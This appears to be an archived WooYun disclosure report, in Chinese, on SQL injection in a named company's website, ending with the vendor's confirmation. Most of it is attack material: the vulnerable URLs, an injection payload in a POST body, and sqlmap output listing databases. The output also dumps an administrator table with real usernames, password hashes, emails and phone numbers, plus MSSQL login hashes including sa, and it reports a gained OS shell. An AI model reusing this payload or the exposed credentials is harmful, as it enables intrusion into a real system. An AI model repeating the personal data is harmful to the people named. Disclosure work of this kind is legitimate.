乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-06: 细节已通知厂商并且等待厂商处理中 2015-03-10: 厂商已经确认,细节仅向厂商公开 2015-03-20: 细节向核心白帽子及相关领域专家公开 2015-03-30: 细节向普通白帽子公开 2015-04-09: 细节向实习白帽子公开 2015-04-20: 细节向公众公开
sa权限注射sqlmap执行os-shell
url:http://www.gdyueyun.com/Stage/AnnualReport.aspx头信息:head%24txtSearch=&hiddMonth=-1%27%20or%2081%20%3d%20%2779&hiddYear=&ImageButton1=&month=0&scSelect=0&txtNewsTitle=&year=0&__EVENTARGUMENT=2&__EVENTTARGET=AspNetPager1&__EVENTVALIDATION=%2FwEWBwKwnOfjBgL36NysAwKH9IrBDgKztZisCQLSwpnTCALU2ry8DQKQvbK%2FC%2FzsTfgMNb%2BI502%2BB%2BSEpKtxX49V&__VIEWSTATE=%2FwEPDwUJMTc4MTgxNDI1D2QWAgIBD2QWBmYPZBYEAgMPFgIeCWlubmVyaHRtbAUP5Yqg5YWl5pS26JeP5aS5ZAIEDxYCHwAFDOiuvuS4uummlumhtWQCBg8WAh4LXyFJdGVtQ291bnQCCRYSZg9kFghmDxUBCjIwMTQtMDktMDJkAgEPFQMlYW5udWFscmVwb3J0LTAtMjAxNDA5MDIxMjMzMDEyMDc4LnBkZhMyMDE05bm05Lit5pyf5aCx5ZGKCe%2B8iHBkZu%2B8iWQCAg8VAyVhbm51YWxyZXBvcnQtMS0yMDE0MDkwMjEyMzMwMTIwNzgucGRmFEludGVyaW0gUmVwb3J0IDIwMTQgCe%2B8iHBkZu%2B8iWQCAw8VAyVhbm51YWxyZXBvcnQtMi0yMDE0MDkwMjEyMzMwMTIwNzgucGRmEzIwMTTlubTkuK3mnJ%2FloLHlkYoJ77yIcGRm77yJZAIBD2QWCGYPFQEKMjAxNC0wNC0xN2QCAQ8VAyVhbm51YWxyZXBvcnQtMC0yMDE0MDQxNzEyMjkxMTU4MDYucGRmDTIwMTPlubTlubTloLEJ77yIcGRm77yJZAICDxUDJWFubnVhbHJlcG9ydC0xLTIwMTQwNDE3MTIyOTExNTgwNi5wZGYSQW5udWFsIFJlcG9ydCAyMDEzCe%2B8iHBkZu%2B8iWQCAw8VAyVhbm51YWxyZXBvcnQtMi0yMDE0MDQxNzEyMjkxMTU4MDYucGRmDTIwMTPlubTlubTloLEJ77yIcGRm77yJZAICD2QWCGYPFQEKMjAxMy0wOS0wNWQCAQ8VAyVhbm51YWxyZXBvcnQtMC0yMDE0MDExNDEwNTExMjgxNDEucGRmEDIwMTPkuK3mnJ%2FmiqXlkYoJ77yIcGRm77yJZAICDxUDJWFubnVhbHJlcG9ydC0xLTIwMTQwMTE0MTA1MTEyODE0MS5wZGYTMjAxMyBJbnRlcmltIFJlcG9ydAnvvIhwZGbvvIlkAgMPFQMlYW5udWFscmVwb3J0LTItMjAxNDAxMTQxMDUxMTI4MTQxLnBkZhAyMDEz5Lit5pyf5aCx5ZGKCe%2B8iHBkZu%2B8iWQCAw9kFghmDxUBCjIwMTMtMDQtMTFkAgEPFQMlYW5udWFscmVwb3J0LTAtMjAxNDAxMTQxMDMwNTc2NjA2LnBkZgoyMDEy5bm05oqlCe%2B8iHBkZu%2B8iWQCAg8VAyVhbm51YWxyZXBvcnQtMS0yMDE0MDExNDEwMzA1NzY2MDYucGRmEjIwMTIgQW5udWFsIFJlcG9ydAnvvIhwZGbvvIlkAgMPFQMlYW5udWFscmVwb3J0LTItMjAxNDAxMTQxMDMwNTc2NjA2LnBkZgoyMDEy5bm05aCxCe%2B8iHBkZu%2B8iWQCBA9kFghmDxUBCjIwMTItMDgtMzFkAgEPFQMlYW5udWFscmVwb3J0LTAtMjAxNDAxMTQxMDM3MzA0NzYxLnBkZhAyMDEy5Lit5pyf5oql5ZGKCe%2B8iHBkZu%2B8iWQCAg8VAyVhbm51YWxyZXBvcnQtMS0yMDE0MDExNDEwMzczMDQ3NjEucGRmEzIwMTIgSW50ZXJpbSBSZXBvcnQJ77yIcGRm77yJZAIDDxUDJWFubnVhbHJlcG9ydC0yLTIwMTQwMTE0MTAzNzMwNDc2MS5wZGYQMjAxMuS4reacn%2BWgseWRignvvIhwZGbvvIlkAgUPZBYIZg8VAQoyMDEyLTA0LTE3ZAIBDxUDJWFubnVhbHJlcG9ydC0wLTIwMTQwMTE0MTAyODQyNzQ3OS5wZGYKMjAxMeW5tOaKpQnvvIhwZGbvvIlkAgIPFQMlYW5udWFscmVwb3J0LTEtMjAxNDAxMTQxMDI4NDI3NDc5LnBkZhIyMDExIEFubnVhbCBSZXBvcnQJ77yIcGRm77yJZAIDDxUDJWFubnVhbHJlcG9ydC0yLTIwMTQwMTE0MTAyODQyNzQ3OS5wZGYKMjAxMeW5tOWgsQnvvIhwZGbvvIlkAgYPZBYIZg8VAQoyMDExLTA5LTA1ZAIBDxUDJWFubnVhbHJlcG9ydC0wLTIwMTQwMTE0MTAyNzUxNTMzMC5wZGYQMjAxMeS4reacn%2BaKpeWRignvvIhwZGbvvIlkAgIPFQMlYW5udWFscmVwb3J0LTEtMjAxNDAxMTQxMDI3NTE1MzQwLnBkZhMyMDExIEludGVyaW0gUmVwb3J0Ce%2B8iHBkZu%2B8iWQCAw8VAyVhbm51YWxyZXBvcnQtMi0yMDE0MDExNDEwMjc1MTUzNDAucGRmEDIwMTHkuK3mnJ%2FloLHlkYoJ77yIcGRm77yJZAIHD2QWCGYPFQEKMjAxMS0wNC0yMGQCAQ8VAyVhbm51YWxyZXBvcnQtMC0yMDE0MDExNDEwMjcyOTY0NTcucGRmCjIwMTDlubTmiqUJ77yIcGRm77yJZAICDxUDJWFubnVhbHJlcG9ydC0xLTIwMTQwMTE0MTAyNzI5NjQ1Ny5wZGYSMjAxMCBBbm51YWwgUmVwb3J0Ce%2B8iHBkZu%2B8iWQCAw8VAyVhbm51YWxyZXBvcnQtMi0yMDE0MDExNDEwMjcyOTY0NTcucGRmCjIwMTDlubTloLEJ77yIcGRm77yJZAIID2QWCGYPFQEKMjAxMC0wOS0wOWQCAQ8VAyVhbm51YWxyZXBvcnQtMC0yMDE0MDExNDEwMjY1NjMwMzgucGRmEDIwMTDkuK3mnJ%2FmiqXlkYoJ77yIcGRm77yJZAICDxUDJWFubnVhbHJlcG9ydC0xLTIwMTQwMTE0MTAyNjU2MzAzOC5wZGYTMjAxMCBJbnRlcmltIFJlcG9ydAnvvIhwZGbvvIlkAgMPFQMlYW5udWFscmVwb3J0LTItMjAxNDAxMTQxMDI2NTYzMDM4LnBkZhAyMDEw5Lit5pyf5aCx5ZGKCe%2B8iHBkZu%2B8iWQCBw8PFgIeC1JlY29yZGNvdW50AhIWAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUMSW1hZ2VCdXR0b24x92QSouXQ%2FHdF9FwtW5invkVssVE%3D
http://www.gdyueyun.com/Stage/SearchPage.aspx?keywords=1*&languagetype=sc
庞大的数据库:
available databases [17]:[*] CopyOfRisk[*] CopyOfRisk_0[*] IGKICPOS[*] master[*] model[*] msdb[*] pams[*] pams0720[*] pams2[*] PAMS_AddonsInfo[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] Test[*] testny[*] Web_YueYunTraffic[*] Web_YueYunTraffic_TestDatabase: Web_YueYunTraffic[26 tables]+-----------------------+| AboutSafety || AdminMenu || AdminPageFunction || Administrator || AnnualReport || CompanyGovernment || ContactUs || CultureGlimpse || Custom || EnterpriseBulletin || EnterprisePublication || FinancialHighlights || IndependentBuild || IndustryNews || LZBuild || MembersNews || Multilingual || News || PFGarden || PageFunction || PartyBuild || PoliciesRegulation || PromotionalMaterial || SocietySound || Sys_Menu || YouthActivity |+-----------------------+Database: Web_YueYunTrafficTable: Administrator[12 columns]+---------------+| Column |+---------------+| AddTime || AdminAdress || AdminAge || AdminEmail || AdminID || AdminName || AdminPhoneNum || AdminPwd || AdminSex || AdminStatus || AdminTrueName || Type |+---------------+Database: Web_YueYunTrafficTable: Administrator[4 entries]+---------+------+----------------------------+----------+----------------------------------+----------+-----------+------------------+-------------+-------------+---------------+---------------+| AdminID | Type | AddTime | AdminAge | AdminPwd | AdminSex | AdminName | AdminEmail | AdminStatus | AdminAdress | AdminPhoneNum | AdminTrueName |+---------+------+----------------------------+----------+----------------------------------+----------+-----------+------------------+-------------+-------------+---------------+---------------+| 1 | NULL | 10 17 2013 12:00AM | 22 | 2AE68513F220DD72CE11F392A1EBB627 | 0 | admin | [email protected] | 0 | NULL | 15802704163 | 管理员 || 11 | NULL | 01 \\?a08 2014 \\?a02:40PM | 23 | F583737E562A35F3F49AFD2A60669F79 | 1 | zhengquan | [email protected] | 0 | NULL | 13562234523 | 证券 || 12 | NULL | 01 \\?a08 2014 \\?a02:40PM | NULL | E10ADC3949BA59ABBE56E057F20F883E | 1 | zhangyang | NULL | 0 | NULL | 15802704163 | 张阳 || 14 | NULL | 04 \\?a08 2014 \\?a09:28AM | 26 | E10ADC3949BA59ABBE56E057F20F883E | 1 | wulan | [email protected] | 0 | NULL | 13579023214 | 吴兰 |+---------+------+----------------------------+----------+----------------------------------+----------+-----------+------------------+-------------+-------------+---------------+---------------+
下面是mssql数据库的用户名密码:
database management system users password hashes:[*] ##MS_PolicyEventProcessingLogin## [1]: password hash: 0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f header: 0x0100 salt: 3869d680 mixedcase: adf63db291c6737f1efb8e4a481b02284215913f[*] ##MS_PolicyTsqlExecutionLogin## [1]: password hash: 0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f header: 0x0100 salt: 8d22a249 mixedcase: df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f[*] nwbackup [1]: password hash: 0x0100c0667d50c359b5ae8e66762d23850539836bbc2149c5e5f7 header: 0x0100 salt: c0667d50 mixedcase: c359b5ae8e66762d23850539836bbc2149c5e5f7[*] PrimaryLogin [1]: password hash: 0x01005c4eb6d69b799ca92ecb8b0805c47a0fe2065cb6a18d0749 header: 0x0100 salt: 5c4eb6d6 mixedcase: 9b799ca92ecb8b0805c47a0fe2065cb6a18d0749[*] sa [1]: password hash: 0x010056049b0eb242f19e81bb1e42a4c38cc6dfea6709b43bda44 header: 0x0100 salt: 56049b0e mixedcase: b242f19e81bb1e42a4c38cc6dfea6709b43bda44
下面是一些截图证明:
证明当前为sa权限用户Truemssql有5个用户:
sqlmap执行os-shell:
你们修,赶紧修吧!!!
危害等级:高
漏洞Rank:11
确认时间:2015-03-10 09:56
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:11正在联系相关网站管理单位处置。
暂无